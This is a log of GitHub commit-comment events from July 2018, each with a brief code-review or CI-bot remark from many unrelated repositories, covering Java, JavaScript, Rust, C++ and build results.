{"id":"7942681405","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29653634,"position":11,"line":11,"path":"hw1/src/main/resources/spring-context.xml","commit_id":"4ddd90130626b3a9f19e7b616dde031f86a20d19","created_at":"2018-07-10T09:48:07Z","updated_at":"2018-07-10T09:48:07Z","author_association":"NONE","body":"А вот здесь тогда придётся писать только constructor-arg"}},"created_at":"2018-07-10T09:48:07Z"}
{"id":"7942684067","type":"CommitCommentEvent","actor":{"login":"jgukelberger"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29653644,"position":null,"line":null,"path":null,"commit_id":"2e3d532b4db356db9baa80c2925dd838e942b6dd","created_at":"2018-07-10T09:48:33Z","updated_at":"2018-07-10T09:48:33Z","author_association":"MEMBER","body":"@basnijholt, this change breaks the API, which intentionally discriminates between booleans and more complex data structures (lists of strings). Have a look at the docstrings, please. After your changes, a user supplying, e.g. `plot_data=['potential_energy']` would have his choice overwritten to `plot_data = ['electrostatic_potential', 'potential_energy']`."}},"created_at":"2018-07-10T09:48:33Z"}
{"id":"7942686353","type":"CommitCommentEvent","actor":{"login":"peny2000"},"repo":{"name":"peny2000/sample"},"payload":{"comment":{"id":29653647,"position":7,"line":7,"path":"README.md","commit_id":"028bf8c7514a2ed639ba593f0a758d9b60bee316","created_at":"2018-07-10T09:48:58Z","updated_at":"2018-07-10T09:48:58Z","author_association":"OWNER","body":"You should not commit\r\nBecause Today is holiday"}},"created_at":"2018-07-10T09:48:58Z"}
{"id":"7942687616","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/nagyfranciska"},"payload":{"comment":{"id":29653648,"position":10,"line":10,"path":"week-08/day-04/db/src/main/java/com/database/db/repositories/TodoRepo.java","commit_id":"802fc5344d8c47f3bceb0b17da5209889788b473","created_at":"2018-07-10T09:49:11Z","updated_at":"2018-07-10T09:49:11Z","author_association":"NONE","body":"This is going to solve your problem 👍 but I recommend to you to check the \"original\" return type(`optional`). It has got many useful methods, just type a \".\" after `findOneById(1)`"}},"created_at":"2018-07-10T09:49:11Z"}
{"id":"7942687765","type":"CommitCommentEvent","actor":{"login":"peny2000"},"repo":{"name":"peny2000/sample"},"payload":{"comment":{"id":29653649,"position":7,"line":7,"path":"README.md","commit_id":"028bf8c7514a2ed639ba593f0a758d9b60bee316","created_at":"2018-07-10T09:49:12Z","updated_at":"2018-07-10T09:49:12Z","author_association":"OWNER","body":"no Study"}},"created_at":"2018-07-10T09:49:12Z"}
{"id":"7942689347","type":"CommitCommentEvent","actor":{"login":"doitian"},"repo":{"name":"NervosFoundation/rust-rocksdb"},"payload":{"comment":{"id":29653657,"position":10,"line":10,"path":"tests/test_pinnable_slice.rs","commit_id":"f4bdb623c1ff1eb7d7ec846986cb166090916c95","created_at":"2018-07-10T09:49:29Z","updated_at":"2018-07-10T09:49:29Z","author_association":"MEMBER","body":"Why adding the trailing comma when args are not split into lines? It looks strange."}},"created_at":"2018-07-10T09:49:29Z"}
{"id":"7942690054","type":"CommitCommentEvent","actor":{"login":"mmmaat"},"repo":{"name":"bootphon/h5features"},"payload":{"comment":{"id":29653659,"position":13,"line":75,"path":"h5features/features.py","commit_id":"4b92d26249cb98d44dedac3a44dec0d43659b423","created_at":"2018-07-10T09:49:36Z","updated_at":"2018-07-10T09:49:36Z","author_association":"CONTRIBUTOR","body":"I'm not sure this is a bug or a feature (but well... this is pretty old in my memory). Did you tried to take the transpose of your data, so that to have a shape of (1, n) instead of (n, )?"}},"created_at":"2018-07-10T09:49:36Z"}
{"id":"7942692866","type":"CommitCommentEvent","actor":{"login":"doitian"},"repo":{"name":"NervosFoundation/rust-rocksdb"},"payload":{"comment":{"id":29653662,"position":null,"line":null,"path":null,"commit_id":"f4bdb623c1ff1eb7d7ec846986cb166090916c95","created_at":"2018-07-10T09:50:06Z","updated_at":"2018-07-10T09:50:06Z","author_association":"MEMBER","body":"Lgtm, except the format question leaved above."}},"created_at":"2018-07-10T09:50:06Z"}
{"id":"7942697669","type":"CommitCommentEvent","actor":{"login":"Civil"},"repo":{"name":"go-graphite/helper-scripts"},"payload":{"comment":{"id":29653679,"position":4,"line":3,"path":"LICENSE","commit_id":"daf90c4ade14814018029302072d66f993fba8e7","created_at":"2018-07-10T09:50:56Z","updated_at":"2018-07-10T09:50:56Z","author_association":"MEMBER","body":"As there is no CLA process for go-graphite group and that basically means that whoever commited there - owns the code. Currently this is only me (as far as I understand nobody touched those scripts).\r\n\r\nI think we should switch to autogenerated License or Owners file to actually show the list of owners for each particular repo."}},"created_at":"2018-07-10T09:50:56Z"}
{"id":"7942700566","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29653686,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-10T09:51:27Z","updated_at":"2018-07-10T09:51:27Z","author_association":"NONE","body":"\n好吧，那我等三天试试。麻烦你了。\n\n\n\n\n    \n    \n    \n\n\n\n    \n        \n            \n                \n                    \n                        \n                    \n                    \n                        \n                            316253432\n                            \n                            \n                                \n                                    邮箱：316253432@qq.com\n                                \n                        \n                    \n                \n            \n        \n    \n\n\nSignature is customized by Netease Mail Master\nOn 07/10/2018 17:35, vrlink wrote: 这个账号今天早上做过一次解抵押操作，还得等3天。不管解抵押的数量是多少，只要做了，之前解抵押的都要等待3天后才能解抵押。\n\n—You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread.\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/EOSVR/EOSVR\",\"title\":\"EOSVR/EOSVR\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/header.png\",\"avatar_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/avatar.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/EOSVR/EOSVR\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@vrlink on b624c8a: 这个账号今天早上做过一次解抵押操作，还得等3天。不管解抵押的数量是多少，只要做了，之前解抵押的都要等待3天后才能解抵押。\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29653455\"}}}\n[\n{\n\"@context\": \"http://schema.org\",\n\"@type\": \"EmailMessage\",\n\"potentialAction\": {\n\"@type\": \"ViewAction\",\n\"target\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29653455\",\n\"url\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29653455\",\n\"name\": \"View Commit\"\n},\n\"description\": \"View this Commit on GitHub\",\n\"publisher\": {\n\"@type\": \"Organization\",\n\"name\": \"GitHub\",\n\"url\": \"https://github.com\"\n}\n}\n]"}},"created_at":"2018-07-10T09:51:27Z"}
{"id":"7942702917","type":"CommitCommentEvent","actor":{"login":"CrosRoad95"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29653691,"position":null,"line":null,"path":null,"commit_id":"021e66504c7d3b8a753f7d97b2dd9b8ba6f6a045","created_at":"2018-07-10T09:51:53Z","updated_at":"2018-07-10T09:51:53Z","author_association":"CONTRIBUTOR","body":"Noice update, i like it "}},"created_at":"2018-07-10T09:51:53Z"}
{"id":"7942703873","type":"CommitCommentEvent","actor":{"login":"hhromic"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":29653693,"position":null,"line":null,"path":null,"commit_id":"e713c3f60d74fbb864122f8f11a80ca302d53da3","created_at":"2018-07-10T09:52:04Z","updated_at":"2018-07-10T09:52:04Z","author_association":"CONTRIBUTOR","body":"Looks like userland should definitively try to bring the Khronos API more up-to-date. Another issue in there also is requiring it: https://github.com/raspberrypi/userland/issues/469\r\nIt doesn't look like they would easily upgrade Khronos as it probably requires a lot of effort."}},"created_at":"2018-07-10T09:52:04Z"}
{"id":"7942704040","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653694,"position":225,"line":225,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:52:07Z","updated_at":"2018-07-10T09:52:07Z","author_association":"OWNER","body":"Should probably map all of the Types and Sub-types. Blizzard localizes all of these already for us, so we could just leverage the existing blizzard loc strings and map them. On that thought, perhaps Blizzard already has this lookup table somewhere that we could leverage?"}},"created_at":"2018-07-10T09:52:07Z"}
{"id":"7942705605","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29653698,"position":null,"line":null,"path":null,"commit_id":"bf9e9676dda686f5b76826b4e3148f4a0b512e3c","created_at":"2018-07-10T09:52:24Z","updated_at":"2018-07-10T09:52:24Z","author_association":"MEMBER","body":"@ebraminio in theory, you could now remove the dependency on msys2 `python2` and just use the default Appveyor python (though I haven't tried to run the tests)\r\n\r\nhttps://github.com/harfbuzz/harfbuzz/blob/bf9e9676dda686f5b76826b4e3148f4a0b512e3c/appveyor.yml#L46"}},"created_at":"2018-07-10T09:52:24Z"}
{"id":"7942706903","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653703,"position":237,"line":237,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:52:39Z","updated_at":"2018-07-10T09:52:39Z","author_association":"OWNER","body":"bc"}},"created_at":"2018-07-10T09:52:39Z"}
{"id":"7942707350","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29653704,"position":null,"line":null,"path":null,"commit_id":"f28e261088a85b9a840dbef5312f82af8e2228c5","created_at":"2018-07-10T09:52:44Z","updated_at":"2018-07-10T09:52:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180710-095237 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180710-095237\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-10T09:52:44Z"}
{"id":"7942707776","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653705,"position":238,"line":238,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:52:49Z","updated_at":"2018-07-10T09:52:49Z","author_association":"OWNER","body":"wotlk"}},"created_at":"2018-07-10T09:52:49Z"}
{"id":"7942708574","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653706,"position":240,"line":240,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:52:58Z","updated_at":"2018-07-10T09:52:58Z","author_association":"OWNER","body":"mop"}},"created_at":"2018-07-10T09:52:58Z"}
{"id":"7942710140","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653708,"position":241,"line":241,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:53:14Z","updated_at":"2018-07-10T09:53:14Z","author_association":"OWNER","body":"Misspelled \"draenor\""}},"created_at":"2018-07-10T09:53:14Z"}
{"id":"7942711082","type":"CommitCommentEvent","actor":{"login":"734530787"},"repo":{"name":"734530787/734530787.github.io"},"payload":{"comment":{"id":29653709,"position":null,"line":null,"path":null,"commit_id":"0d21856eb841f130af35e706dadf4cc42bad061f","created_at":"2018-07-10T09:53:25Z","updated_at":"2018-07-10T09:53:25Z","author_association":"OWNER","body":"集合的文件夹"}},"created_at":"2018-07-10T09:53:25Z"}
{"id":"7942711229","type":"CommitCommentEvent","actor":{"login":"Nevaan"},"repo":{"name":"gliderlabs/docker-alpine"},"payload":{"comment":{"id":29653710,"position":null,"line":null,"path":null,"commit_id":"8487b91a84a6aad0965921fa821b5222d0ae7c2d","created_at":"2018-07-10T09:53:26Z","updated_at":"2018-07-10T09:53:26Z","author_association":"NONE","body":"please create ammend commit :)"}},"created_at":"2018-07-10T09:53:26Z"}
{"id":"7942716555","type":"CommitCommentEvent","actor":{"login":"boshko26"},"repo":{"name":"boshko26/sitetesting"},"payload":{"comment":{"id":29653727,"position":2,"line":2,"path":"main1.css","commit_id":"5f119dae76b361ac907e0ffa51335bb7122e093c","created_at":"2018-07-10T09:54:24Z","updated_at":"2018-07-10T09:54:24Z","author_association":"OWNER","body":"Resetting margins\r\n"}},"created_at":"2018-07-10T09:54:24Z"}
{"id":"7942717235","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653730,"position":235,"line":235,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:54:32Z","updated_at":"2018-07-10T09:54:32Z","author_association":"OWNER","body":"Shouldn't this map be the other way around, where the keys are the friendly names and the integers are the values?"}},"created_at":"2018-07-10T09:54:32Z"}
{"id":"7942719212","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29653731,"position":null,"line":null,"path":null,"commit_id":"bf9e9676dda686f5b76826b4e3148f4a0b512e3c","created_at":"2018-07-10T09:54:54Z","updated_at":"2018-07-10T09:54:54Z","author_association":"MEMBER","body":"Looks great! Go ahead :)"}},"created_at":"2018-07-10T09:54:54Z"}
{"id":"7942726332","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653739,"position":102,"line":102,"path":"week-08/day-03/login-form.html","commit_id":"64799b4bf0b01076947f72848a52c848fed210bd","created_at":"2018-07-10T09:56:12Z","updated_at":"2018-07-10T09:56:12Z","author_association":"NONE","body":"=>"}},"created_at":"2018-07-10T09:56:12Z"}
{"id":"7942727964","type":"CommitCommentEvent","actor":{"login":"jtylr"},"repo":{"name":"signalapp/Signal-Desktop"},"payload":{"comment":{"id":29653742,"position":null,"line":null,"path":null,"commit_id":"9d41b8616296f1b328aa864e0114b99d7f11ca06","created_at":"2018-07-10T09:56:29Z","updated_at":"2018-07-10T09:56:29Z","author_association":"NONE","body":"😬 "}},"created_at":"2018-07-10T09:56:29Z"}
{"id":"7942728747","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653743,"position":104,"line":104,"path":"week-08/day-03/login-form.html","commit_id":"64799b4bf0b01076947f72848a52c848fed210bd","created_at":"2018-07-10T09:56:38Z","updated_at":"2018-07-10T09:56:38Z","author_association":"NONE","body":"Use single quotes + missing ;"}},"created_at":"2018-07-10T09:56:38Z"}
{"id":"7942732713","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653751,"position":104,"line":104,"path":"week-08/day-03/login-form.html","commit_id":"64799b4bf0b01076947f72848a52c848fed210bd","created_at":"2018-07-10T09:57:21Z","updated_at":"2018-07-10T09:57:21Z","author_association":"NONE","body":"`alert( 'Passwords doesn\\'t match, please try again!');`"}},"created_at":"2018-07-10T09:57:21Z"}
{"id":"7942737978","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653762,"position":33,"line":33,"path":"week-08/day-03/movie-selector.html","commit_id":"36ee8812ebc8afd2ab86109ee9f59686a8fbd42c","created_at":"2018-07-10T09:58:20Z","updated_at":"2018-07-10T09:58:20Z","author_association":"NONE","body":"Close the array in the next line."}},"created_at":"2018-07-10T09:58:20Z"}
{"id":"7942739923","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653763,"position":40,"line":40,"path":"week-08/day-03/movie-selector.html","commit_id":"36ee8812ebc8afd2ab86109ee9f59686a8fbd42c","created_at":"2018-07-10T09:58:42Z","updated_at":"2018-07-10T09:58:42Z","author_association":"NONE","body":"=>"}},"created_at":"2018-07-10T09:58:42Z"}
{"id":"7942742901","type":"CommitCommentEvent","actor":{"login":"LinusAndersen"},"repo":{"name":"JuliusAndersen/FitIt"},"payload":{"comment":{"id":29653767,"position":null,"line":null,"path":null,"commit_id":"adfd0829f468f1b74b8498e3b3f215bb11e0e4dc","created_at":"2018-07-10T09:59:16Z","updated_at":"2018-07-10T09:59:16Z","author_association":"NONE","body":"good job"}},"created_at":"2018-07-10T09:59:16Z"}
{"id":"7942744065","type":"CommitCommentEvent","actor":{"login":"SirPryderi"},"repo":{"name":"xxLestadxx/DropTheBeat"},"payload":{"comment":{"id":29653769,"position":null,"line":null,"path":null,"commit_id":"639ba0714f80deb2db53bdaa9286e180c9e22824","created_at":"2018-07-10T09:59:29Z","updated_at":"2018-07-10T09:59:29Z","author_association":"NONE","body":"Those commit naming skills. :P"}},"created_at":"2018-07-10T09:59:29Z"}
{"id":"7942744966","type":"CommitCommentEvent","actor":{"login":"mudather5"},"repo":{"name":"mudather5/Archiducheese"},"payload":{"comment":{"id":29653772,"position":null,"line":null,"path":null,"commit_id":"f11b7913d62a3a839e1b8b959afe07e8d37e4b2c","created_at":"2018-07-10T09:59:39Z","updated_at":"2018-07-10T09:59:39Z","author_association":"OWNER","body":"I have created web site which contain two pages "}},"created_at":"2018-07-10T09:59:39Z"}
{"id":"7942745064","type":"CommitCommentEvent","actor":{"login":"CarlosGS"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29653773,"position":null,"line":null,"path":null,"commit_id":"1e0d58222d278d0ef29c6bae1ef4a3e9131ea690","created_at":"2018-07-10T09:59:40Z","updated_at":"2018-07-10T09:59:40Z","author_association":"CONTRIBUTOR","body":"What happened?"}},"created_at":"2018-07-10T09:59:40Z"}
{"id":"7942745503","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653774,"position":43,"line":43,"path":"week-08/day-03/movie-selector.html","commit_id":"36ee8812ebc8afd2ab86109ee9f59686a8fbd42c","created_at":"2018-07-10T09:59:45Z","updated_at":"2018-07-10T09:59:45Z","author_association":"NONE","body":"You have to use parentheses in __forEach__ even if you have one parameter only.\r\n`.forEach((element) => {`"}},"created_at":"2018-07-10T09:59:45Z"}
{"id":"7942746784","type":"CommitCommentEvent","actor":{"login":"Larsv94"},"repo":{"name":"VisserSanne/WebDev-Bootcamp"},"payload":{"comment":{"id":29653777,"position":81,"line":81,"path":"Course/Quizzes/09_Selector_Exercise_Starter/selectors.css","commit_id":"0ed20f2c975bc3cf17f25c2f272c0149ba244ab5","created_at":"2018-07-10T09:59:59Z","updated_at":"2018-07-10T09:59:59Z","author_association":"NONE","body":"Good use of the attribute selector!"}},"created_at":"2018-07-10T09:59:59Z"}
{"id":"7947002711","type":"CommitCommentEvent","actor":{"login":"ldct"},"repo":{"name":"ethereum/pyethereum"},"payload":{"comment":{"id":29664516,"position":null,"line":null,"path":null,"commit_id":"2a8aaf145b75d989d7b36fde389f7ff5cf4a421f","created_at":"2018-07-11T00:00:12Z","updated_at":"2018-07-11T00:00:12Z","author_association":"CONTRIBUTOR","body":"@joeykrug can you drop the declared support for python 2 in this file. it doesn't actually work anymore."}},"created_at":"2018-07-11T00:00:12Z"}
{"id":"7947003546","type":"CommitCommentEvent","actor":{"login":"mrJean1"},"repo":{"name":"mrJean1/PyGeodesy"},"payload":{"comment":{"id":29664527,"position":null,"line":null,"path":null,"commit_id":"d13994ae241665ac567cfca44152b8ee63e07624","created_at":"2018-07-11T00:00:25Z","updated_at":"2018-07-11T00:00:25Z","author_association":"OWNER","body":"First CI run"}},"created_at":"2018-07-11T00:00:25Z"}
{"id":"7947006334","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29664534,"position":null,"line":null,"path":null,"commit_id":"d21b054f3c83f009b008c63a9ee9ea0c5a8d5c02","created_at":"2018-07-11T00:01:21Z","updated_at":"2018-07-11T00:01:21Z","author_association":"CONTRIBUTOR","body":"引用要加`const`"}},"created_at":"2018-07-11T00:01:21Z"}
{"id":"7947007314","type":"CommitCommentEvent","actor":{"login":"IrishKorean"},"repo":{"name":"fsanchez4/DataStructuresProject"},"payload":{"comment":{"id":29664536,"position":78,"line":91,"path":"GameChoice.java","commit_id":"5b8b089de3690035d65ad193e79d6ebac94845d2","created_at":"2018-07-11T00:01:42Z","updated_at":"2018-07-11T00:01:42Z","author_association":"COLLABORATOR","body":"We might be changing from using buttons to using tabs, as that is much easier to do. Otherwise, for what you're currently doing, the button selection options should be in an actionlistener with if statements for each button separately, that's my initial thoughts."}},"created_at":"2018-07-11T00:01:42Z"}
{"id":"7947007494","type":"CommitCommentEvent","actor":{"login":"TheComputerGenie"},"repo":{"name":"cygnusxi/CurecoinSource"},"payload":{"comment":{"id":29664537,"position":null,"line":null,"path":null,"commit_id":"005b4da978e9dbf6529983c04783c0e97667546a","created_at":"2018-07-11T00:01:46Z","updated_at":"2018-07-11T00:01:46Z","author_association":"NONE","body":"Well, that was April, now it's July, and only 15 more months to go before this commit means anything."}},"created_at":"2018-07-11T00:01:46Z"}
{"id":"7947011264","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29664544,"position":null,"line":null,"path":null,"commit_id":"f68b858702c492251262d8785e390004942a3b55","created_at":"2018-07-11T00:03:09Z","updated_at":"2018-07-11T00:03:09Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-11T00:03:09Z"}
{"id":"7947016016","type":"CommitCommentEvent","actor":{"login":"katbyte"},"repo":{"name":"afklm/crowd"},"payload":{"comment":{"id":29664553,"position":null,"line":null,"path":null,"commit_id":"33a0fd7838a17f59e36697713cfcd44d1fd369d8","created_at":"2018-07-11T00:04:59Z","updated_at":"2018-07-11T00:04:59Z","author_association":"CONTRIBUTOR","body":"I have clicked the \"Adopt Me\" button in the super market a while back and have not heard anything."}},"created_at":"2018-07-11T00:04:59Z"}
{"id":"7947017562","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29664554,"position":23,"line":106,"path":"BZOJ/4066.cpp","commit_id":"c7d31f9585657d85f2949fa26647eb89ad40c3f3","created_at":"2018-07-11T00:05:33Z","updated_at":"2018-07-11T00:05:33Z","author_association":"CONTRIBUTOR","body":"这个操作被我写在了模板里面😛\r\n```\r\ntemplate<class T>inline void mset(T a,int v,int n){memset(a,v,n*sizeof(a[0]));}\r\n```"}},"created_at":"2018-07-11T00:05:33Z"}
{"id":"7947017680","type":"CommitCommentEvent","actor":{"login":"edmc-ss"},"repo":{"name":"swiftstack/ProxyFS"},"payload":{"comment":{"id":29664555,"position":null,"line":null,"path":null,"commit_id":"42087901d8399f746bc92d9f01ad411ae5f0d8ae","created_at":"2018-07-11T00:05:36Z","updated_at":"2018-07-11T00:05:36Z","author_association":"CONTRIBUTOR","body":"Perfect!"}},"created_at":"2018-07-11T00:05:36Z"}
{"id":"7947019912","type":"CommitCommentEvent","actor":{"login":"kiddyboots216"},"repo":{"name":"jackzampolin/tendermint"},"payload":{"comment":{"id":29664561,"position":null,"line":null,"path":null,"commit_id":"5e5bb2610df3a18bdbecc22b0e7e08e635ce1fc1","created_at":"2018-07-11T00:06:27Z","updated_at":"2018-07-11T00:06:27Z","author_association":"NONE","body":"@jackzampolin I have; as you can see in the pastebin, the output of go env | grep GOPATH is as expected."}},"created_at":"2018-07-11T00:06:27Z"}
{"id":"7947025183","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29664577,"position":24,"line":2671,"path":"src/spesh/optimize.c","commit_id":"2bab220aff0be5f979218d761b3a9ed9507a445e","created_at":"2018-07-11T00:08:24Z","updated_at":"2018-07-11T00:08:24Z","author_association":"CONTRIBUTOR","body":"\"**c**an likely lo**o**sen\""}},"created_at":"2018-07-11T00:08:24Z"}
{"id":"7947031738","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29664600,"position":23,"line":106,"path":"BZOJ/4066.cpp","commit_id":"c7d31f9585657d85f2949fa26647eb89ad40c3f3","created_at":"2018-07-11T00:10:57Z","updated_at":"2018-07-11T00:10:57Z","author_association":"CONTRIBUTOR","body":"……我错了。这里应该是\r\n```cpp\r\ntemplate<class T>inline void mcpy(T a,T b,int n){memcpy(a,b,n*sizeof(a[0]));}\r\n```"}},"created_at":"2018-07-11T00:10:57Z"}
{"id":"7947033058","type":"CommitCommentEvent","actor":{"login":"lopez86"},"repo":{"name":"lopez86/pandas"},"payload":{"comment":{"id":29664604,"position":null,"line":null,"path":null,"commit_id":"354344939e97c62cfbe551a3cb2dee6ea94ff3a4","created_at":"2018-07-11T00:11:27Z","updated_at":"2018-07-11T00:11:27Z","author_association":"OWNER","body":"Not quite fixed yet. ValueError fixed but now is not properly looping through series elements somewhere."}},"created_at":"2018-07-11T00:11:27Z"}
{"id":"7947035118","type":"CommitCommentEvent","actor":{"login":"lopez86"},"repo":{"name":"lopez86/pandas"},"payload":{"comment":{"id":29664610,"position":null,"line":null,"path":null,"commit_id":"354344939e97c62cfbe551a3cb2dee6ea94ff3a4","created_at":"2018-07-11T00:12:14Z","updated_at":"2018-07-11T00:12:14Z","author_association":"OWNER","body":"Also, out = ids --> out = [] seems to have the same effect and is better"}},"created_at":"2018-07-11T00:12:14Z"}
{"id":"7947038841","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29664623,"position":null,"line":null,"path":null,"commit_id":"0417252c14374dca75f5219f3cfe1d8435ca326c","created_at":"2018-07-11T00:13:40Z","updated_at":"2018-07-11T00:13:40Z","author_association":"CONTRIBUTOR","body":"I think you forgot about devices/bus/coco/coco_ssc.cpp."}},"created_at":"2018-07-11T00:13:40Z"}
{"id":"7947039488","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29664633,"position":null,"line":null,"path":null,"commit_id":"c1bb882fc6f3443aceaf36e725cf9101cf06bf24","created_at":"2018-07-11T00:13:56Z","updated_at":"2018-07-11T00:13:56Z","author_association":"COLLABORATOR","body":"<h3>set tabIndex=-1 on disabled buttons</h3>\n\nPreview: <strong><a href='https://18238-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18238-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18238-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T00:13:56Z"}
